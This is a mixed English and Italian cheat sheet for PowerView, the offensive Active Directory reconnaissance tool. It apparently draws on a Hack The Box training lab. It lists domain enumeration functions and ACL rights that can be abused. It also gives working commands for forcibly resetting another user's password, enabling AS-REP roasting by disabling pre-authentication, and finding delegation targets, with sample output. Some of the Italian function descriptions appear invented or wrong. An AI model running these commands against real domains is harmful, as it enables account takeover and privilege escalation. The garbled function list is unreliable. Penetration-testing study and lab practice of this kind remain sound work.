PowerView
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Export-PowerViewCSV
Append results to a CSV file
ConvertTo-SID
Convert a User or group name to its SID value
Get-DomainSPNTicket
Requests the Kerberos ticket for a specified Service Principal Name (SPN) account
Domain/LDAP Functions:
Get-Domain
Will return the AD object for the current (or specified) domain
Get-DomainController
Return a list of the Domain Controllers for the specified domain
Get-DomainUser
Will return all users or specific user objects in AD
Get-DomainComputer
Will return all computers or specific computer objects in AD
Get-DomainGroup
Will return all groups or specific group objects in AD
Get-DomainOU
Search for all or specific OU objects in AD
Find-InterestingDomainAcl
Finds object ACLs in the domain with modification rights set to non-built in objects
Get-DomainGroupMember
Will return the members of a specific domain group
Get-DomainFileServer
Returns a list of servers likely functioning as file servers
Get-DomainDFSShare
Returns a list of all distributed file systems for the current (or specified) domain
GPO Functions:
Get-DomainGPO
Will return all GPOs or specific GPO objects in AD
Get-DomainPolicy
Returns the default domain policy or the domain controller policy for the current domain
Computer Enumeration Functions:
Get-NetLocalGroup
Enumerates local groups on the local or a remote machine
Get-NetLocalGroupMember
Enumerates members of a specific local group
Get-NetShare
Returns open shares on the local (or a remote) machine
Get-NetSession
Will return session information for the local (or a remote) machine
Test-AdminAccess
Tests if the current user has administrative access to the local (or a remote) machine
Threaded 'Meta'-Functions:
Find-DomainUserLocation
Finds machines where specific users are logged in
Find-DomainShare
Finds reachable shares on domain machines
Find-InterestingDomainShareFile
Searches for files matching specific criteria on readable shares in the domain
Find-LocalAdminAccess
Find machines on the local domain where the current user has local administrator access
Domain Trust Functions:
Get-DomainTrust
Returns domain trusts for the current domain or a specified domain
Get-ForestTrust
Returns all forest trusts for the current forest or a specified forest
Get-DomainForeignUser
Enumerates users who are in groups outside of the user's domain
Get-DomainForeignGroupMember
Enumerates groups with users outside of the group's domain and returns each foreign member
Get-DomainTrustMapping
Will enumerate all trusts for the current domain and any others seen.
Creating a List of Domain Users
PS> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
Find Interesting ACL
Find-InterestingDomainAcl
Covert NameToSID
PS C:\htb> $sid = Convert-NameToSid wley
Using Get-DomainObjectACL
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
Get ActiveDirectoryRights
Permessi interessanti:
GenericAll - full rights to the object (add users to a group or reset user's password)
GenericWrite - update object's attributes (i.e logon script)
WriteOwner - change object owner to attacker controlled user take over the object
WriteDACL - modify object's ACEs and give attacker full control right over the object
AllExtendedRights - ability to add user to a group or reset password
ForceChangePassword - ability to change user's password
Self (Self-Membership) - ability to add yourself to a group
Get-ObjectAcl -SamAccountName <samaccountname> -ResolveGUIDs
Get-ObjectAcl -SamAccountName carole.holmes -ResolveGuids | ? {$_.ActiveDirectoryRights -match ("WriteDacl|GenericWrite|GenericAll") }
Resolving GUID
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
Change Password Force-Change-Password
PS C:\htb> $SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
PS C:\htb> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
PS C:\htb> $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
PS C:\htb> cd C:\Tools\
PS C:\htb> Import-Module .\PowerView.ps1
PS C:\htb> Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'damundsen'
VERBOSE: [Set-DomainUserPassword] Password for user 'damundsen' successfully reset
Get User Group Member
PS C:\Tools> Get-NetLocalGroupMember -GroupName "Remote Management Users"
ComputerName : ACADEMY-EA-MS01
GroupName : Remote Management Users
MemberName : INLANEFREIGHT\forend
SID : S-1-5-21-3842939050-3880317879-2865463114-5614
IsGroup : False
IsDomain : UNKNOWN
PS C:\Tools> Get-DomainGroupMember -Identity "Remote Management Users" -Recurse
GroupDomain : INLANEFREIGHT.LOCAL
GroupName : Remote Management Users
GroupDistinguishedName : CN=Remote Management Users,CN=Builtin,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain : INLANEFREIGHT.LOCAL
MemberName : bdavis
MemberDistinguishedName : CN=Brian Davis,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass : user
MemberSID : S-1-5-21-3842939050-3880317879-2865463114-1162
AS-REPRoasting
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainUser -UACFilter DONT_REQ_PREAUTH
...
Set DONT_REQ_PREAUTH with PowerView
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=userName)(name=userName)(displayname=userName))))
VERBOSE: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'userName'
Informazioni sull'Active Directory
Get-NetDomain
: Ottiene informazioni sul dominio corrente.Get-NetForest
: Ottiene informazioni sulla foresta corrente.Get-NetDomainController
: Ottiene i controller di dominio nel dominio corrente.Get-NetGroup
: Ottiene informazioni sui gruppi dell'Active Directory.Get-NetUser
: Ottiene informazioni sugli utenti dell'Active Directory.Get-NetComputer
: Ottiene informazioni sui computer dell'Active Directory.Get-NetOU
: Ottiene informazioni sulle unità organizzative dell'Active Directory.
Enumerazione
Get-NetGroupMember
: Ottiene i membri di un gruppo.Get-NetLocalGroup
: Ottiene i gruppi locali su un computer remoto.Get-NetLocalGroupMember
: Ottiene i membri di un gruppo locale su un computer remoto.Get-NetShare
: Ottiene le condivisioni di rete su un computer remoto.Get-NetLoggedon
: Ottiene gli utenti attualmente collegati a un computer remoto.
Esplorazione dei privilegi
Find-LocalAdminAccess
: Trova gli account utente che hanno accesso di amministratore locale su computer remoti.Find-DomainUserLocation
: Trova i computer ai quali un utente ha accesso.Find-InterestingDomainShareFile
: Trova file condivisi interessanti all'interno dell'Active Directory.
Esplorazione delle relazioni di trust
Get-NetDomainTrust
: Ottiene le relazioni di trust tra domini.Get-NetForestTrust
: Ottiene le relazioni di trust tra foreste.
Esecuzione remota
Invoke-NetCommand
: Esegue un comando in remoto su uno o più computer.
Enumerazione delle autorizzazioni
Get-NetFilePermissions
: Ottiene le autorizzazioni dei file su un computer remoto.Get-NetSharePermissions
: Ottiene le autorizzazioni delle condivisioni di rete su un computer remoto.Get-NetLocalGroupMapping
: Ottiene la mappatura dei gruppi locali su un computer remoto.Get-NetEffectivePermission
: Ottiene le autorizzazioni effettive di un utente o gruppo su una risorsa.
Enumerazione dei servizi
Get-NetService
: Ottiene informazioni sui servizi in esecuzione su un computer remoto.Get-NetLoggedon
: Ottiene gli utenti attualmente collegati a un computer remoto.
Enumerazione dei token
Get-NetToken
: Ottiene informazioni sui token utente e di sistema su un computer remoto.
Enumerazione delle sessioni
Get-NetSession
: Ottiene le sessioni di rete su un computer remoto.Get-NetLoggedon
: Ottiene gli utenti attualmente collegati a un computer remoto.
Enumerazione dei trust
Get-NetDomainTrust
: Ottiene le relazioni di trust tra domini.Get-NetForestTrust
: Ottiene le relazioni di trust tra foreste.
Gestione dei SID History
Invoke-NetUserAdd
: Aggiunge un SID a un account utente.Invoke-NetUserClone
: Clona un account utente, inclusi gli attributi SID History.
Gestione del dominio
Add-NetGroupMember
: Aggiunge un membro a un gruppo dell'Active Directory.Add-NetGroupUser
: Aggiunge un utente a un gruppo dell'Active Directory.Add-NetLocalGroupMember
: Aggiunge un membro a un gruppo locale su un computer remoto.
Kerberos Delegation
User Unconstrained Delegation
Get-NetUser | Where-Object { $_.TrustedForDelegation }
Constrained Delegation
Get-DomainComputer -TrustedToAuth
FindUser With ActiveDirectoryRights (WriteDacl|GenericWrite|GenericAll)
Get-ObjectAcl -SamAccountName carole.holmes -ResolveGuids | ? {$_.ActiveDirectoryRights -match ("WriteDacl|GenericWrite|GenericAll") }
Retrieving Domain SID
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainSID
S-1-5-21-2974783224-3764228556-2640795941
General Tips
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
Last updated